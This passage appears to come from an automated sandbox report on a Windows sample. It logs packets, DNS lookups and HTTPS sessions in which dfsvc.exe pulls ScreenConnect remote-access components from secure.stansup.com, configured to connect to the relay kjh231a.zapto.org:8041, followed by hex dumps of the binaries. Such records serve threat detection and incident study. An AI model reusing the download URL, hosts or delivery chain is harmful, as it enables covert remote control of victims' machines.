                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.797365904 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802330017 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802381992 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802422047 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802428007 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.802468061 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803708076 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803755999 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803792953 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803797960 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803833008 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.803864956 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804776907 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804821014 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804853916 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804860115 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.804903030 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.889976978 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890011072 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890091896 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890126944 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.890141964 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.891968966 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892014027 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892040968 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892103910 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.892112017 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.894449949 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908634901 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908654928 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908746004 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908757925 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908785105 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:53.908807039 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009111881 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009169102 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009244919 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009259939 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009293079 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009315014 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.009943962 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010005951 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010018110 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010026932 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010050058 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.010123014 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012389898 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012403011 CEST4434991079.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012417078 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:54.012459993 CEST49910443192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.485327005 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.490930080 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.490993977 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.310394049 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.315895081 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.549129963 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.570194960 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.575632095 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.812694073 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:58.866961002 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:28:00.337471962 CEST499448041192.168.2.1179.110.49.185
                                                                                                                                                                                                                                                        Oct 25, 2024 19:28:00.343702078 CEST80414994479.110.49.185192.168.2.11
                                                                                                                                                                                                                                                        Oct 25, 2024 19:28:00.344057083 CEST499448041192.168.2.1179.110.49.185
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 25, 2024 19:27:21.303411961 CEST | 56257 | 53 | 192.168.2.11 | 1.1.1.1 |
| Oct 25, 2024 19:27:21.464466095 CEST | 53 | 56257 | 1.1.1.1 | 192.168.2.11 |
| Oct 25, 2024 19:27:57.444528103 CEST | 62765 | 53 | 192.168.2.11 | 1.1.1.1 |
| Oct 25, 2024 19:27:57.452666044 CEST | 53 | 62765 | 1.1.1.1 | 192.168.2.11 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 25, 2024 19:27:21.303411961 CEST | 192.168.2.11 | 1.1.1.1 | 0x9de8 | Standard query (0) | secure.stansup.com | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:57.444528103 CEST | 192.168.2.11 | 1.1.1.1 | 0x53d5 | Standard query (0) | kjh231a.zapto.org | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Oct 25, 2024 19:27:14.956476927 CEST | 1.1.1.1 | 192.168.2.11 | 0x39f | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 25, 2024 19:27:14.956476927 CEST | 1.1.1.1 | 192.168.2.11 | 0x39f | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 25, 2024 19:27:14.956476927 CEST | 1.1.1.1 | 192.168.2.11 | 0x39f | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:21.464466095 CEST | 1.1.1.1 | 192.168.2.11 | 0x9de8 | No error (0) | secure.stansup.com | | 79.110.49.185 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:23.269968033 CEST | 1.1.1.1 | 192.168.2.11 | 0x4dde | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:23.269968033 CEST | 1.1.1.1 | 192.168.2.11 | 0x4dde | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:25.673940897 CEST | 1.1.1.1 | 192.168.2.11 | 0xd30f | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 25, 2024 19:27:25.673940897 CEST | 1.1.1.1 | 192.168.2.11 | 0xd30f | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:28.080862999 CEST | 1.1.1.1 | 192.168.2.11 | 0x9c59 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 25, 2024 19:27:28.080862999 CEST | 1.1.1.1 | 192.168.2.11 | 0x9c59 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:54.510679007 CEST | 1.1.1.1 | 192.168.2.11 | 0x6401 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:27:54.510679007 CEST | 1.1.1.1 | 192.168.2.11 | 0x6401 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                                                                        Oct 25, 2024 19:27:57.452666044 CEST1.1.1.1192.168.2.110x53d5No error (0)kjh231a.zapto.org79.110.49.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        • secure.stansup.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49727 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:22 UTC | 630 | OUT | GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:22 UTC | 250 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 118229
Content-Type: application/x-ms-application; charset=utf-8
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:21 GMT
Connection: close
2024-10-25 17:27:22 UTC | 16134 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49749 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:25 UTC | 100 | OUT | GET /Bin/ScreenConnect.Client.manifest HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:25 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17858
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:24 GMT
Connection: close
2024-10-25 17:27:25 UTC | 16169 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49784 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:30 UTC | 126 | OUT | GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
Connection: Keep-Alive
2024-10-25 17:27:31 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 95520
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:30 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.11 | 49796 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:32 UTC | 134 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
2024-10-25 17:27:33 UTC | 215 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 61216
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:32 GMT
                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.11 | 49808 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:34 UTC | 138 | OUT | GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
2024-10-25 17:27:34 UTC | 213 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:34 GMT
                                                                                                                                                                                                                                                        Connection: close
2024-10-25 17:27:34 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.11 | 49817 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:35 UTC | 109 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
2024-10-25 17:27:35 UTC | 213 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:35 GMT
                                                                                                                                                                                                                                                        Connection: close
2024-10-25 17:27:35 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.11 | 49824 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:36 UTC | 117 | OUT | GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
2024-10-25 17:27:36 UTC | 213 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:36 GMT
                                                                                                                                                                                                                                                        Connection: close
2024-10-25 17:27:36 UTC | 266 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.11  49834        79.110.49.185   443               7652  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-25 17:27:37 UTC  107                OUT        GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                       Host: secure.stansup.com
                                                       Accept-Encoding: gzip
2024-10-25 17:27:38 UTC  215                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 81696
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 25 Oct 2024 17:27:38 GMT
                                                       Connection: close


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.11  49844        79.110.49.185   443               7652  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-25 17:27:39 UTC  95                 OUT        GET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                       Host: secure.stansup.com
                                                       Accept-Encoding: gzip
2024-10-25 17:27:40 UTC  216                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 197120
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 25 Oct 2024 17:27:39 GMT
                                                       Connection: close


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.11  49859        79.110.49.185   443               7652  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp                Bytes transferred  Direction  Data
2024-10-25 17:27:42 UTC  120                OUT        GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                       Host: secure.stansup.com
                                                       Accept-Encoding: gzip
                                                       Connection: Keep-Alive
2024-10-25 17:27:42 UTC  217                IN         HTTP/1.1 200 OK
                                                       Cache-Control: private
                                                       Content-Length: 1721856
                                                       Content-Type: text/html
                                                       Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                       Date: Fri, 25 Oct 2024 17:27:42 GMT
                                                       Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.11 | 49880 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:46 UTC | 102 | OUT | GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:46 UTC | 215 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:46 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.11 | 49891 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:47 UTC | 93 | OUT | GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:48 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 548352
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:47 GMT
Connection: close
                                                                                                                                                                                                                                                        Data Ascii: o~%-&~s%(+(g(r+*n((*>s%}*s ~%-&=s;%(+*(+(+-j+j(E(+*&f__`*v(+(+(+(E(+*:,(+**03(+(
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 72 10 14 00 70 a2 25 1b 02 28 51 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 53 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 55 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 57 07 00 06 28 4f 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 59 07 00 06 0b 12 01 fe 16 29 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 5b 07 00 06 0c 12 02 fe 16 2a 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 5d 07 00 06 0d 12 03 28 2f 05 00 0a a2 28 2a 02 00 0a 2a 1e 02 28 4c 07 00 06 2a 1e 02 7b a1 02 00 04 2a 22 02 03 7d a1 02 00 04 2a 00 00 13 30 02 00 1f 00 00 00 5a 00 00 11 72 90 14 00 70 02 28 61 07 00 06 0a 12 00 fe 16 c1 00 00
                                                                                                                                                                                                                                                        Data Ascii: rp%(Q(%r"p%(S(%r4p%(U(%r2p%(W(O%rHp%(Y)oC%rhp%([*oC%rp%(](/(**(L*{*"}*0Zrp(a
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d7 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 2f 0a 00 06 02 03 7d d8 03 00 04 02 04 7d d9 03 00 04 2a 1e 02 7b d8 03 00 04 2a 1e 02 7b d9 03 00 04 2a 5a 03 02 28 37 0a 00 06 5a 1e 28 12 04 00 06 02 28 38 0a 00 06 58 2a 86 02 03 04 28 36 0a 00 06 02 05 75 95 00 00 02 7d da 03 00 04 02 05 75 94 00 00 02 7d db 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b da 03 00 04 28 0f 04 00 06 02 7b db 03 00 04 28 0f 04 00 06 2a 00 00 13 30 07 00 e6 00 00 00 52 01 00 11 02 04 28 39 0a 00 06 0a 02 28 38 0a 00 06 16 fe 03 0b 02 7b da 03 00 04 2c 67 05 06 5a 0c 02 08 16 28 32
                                                                                                                                                                                                                                                        Data Ascii: |(+3*0)Q{(-tO|(+3*V(/}}*{*{*Z(7Z((8X*(6u}u}*(c,{({(*0R(9(8{,gZ(2
                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 07 04 07 6f 03 0c 00 06 02 05 07 6f 02 0c 00 06 28 03 09 00 06 6f 06 0c 00 06 28 fb 0b 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3b 04 00 04 02 04 7d 3c 04 00 04 02 05 7d 3d 04 00 04 02 0e 04 7d 3e 04 00 04 02 0e 05 7d 3f 04 00 04 2a 1e 02 7b 3b 04 00 04 2a 1e 02 7b 3c 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 00 0a 2d 1e 28 64 01 00 0a d0 81 00 00 1b 28 3c 01 00 0a 28 0c 05 00 06 6f 8c 0b 00 06 80 1b 07 00 0a de 07 06 28 2d 01 00 0a dc 7e 1b 07 00 0a 2a 00 01 10 00 00 02 00 13 00 27 3a 00 07 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: oo(o(o-,o*29(<};}<}=}>}?*{;*{<*{=*{>*{?*0G*~-:~(,~-(d(<(o(-~*':
                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 a5 0d 00 06 80 30 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 31 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 ae 0d 00 06 80 36 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 56 02 00 06 2a 22 03 04 28 5c 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 39 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 2f 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 b1 01 00 11 02 7b 39 05 00 04 03 16 28 f0 01 00 2b 0a 12 00 28 7b 08 00 0a 6f 31 02 00 06 2a 36 02 7b 39 05 00 04 03 6f 33 02 00 06 2a 00 00 00 13 30 02 00 1a 00 00 00 b2 01 00 11 02 7b 39
                                                                                                                                                                                                                                                        Data Ascii: sjz(<*.s0*(<*2{1oB*(<*6{o{*(<*6{o{*.s6*(<*"(V*"(\*(<*0{9(+d(zo/*0{9(+({o1*6{9o3*0{9
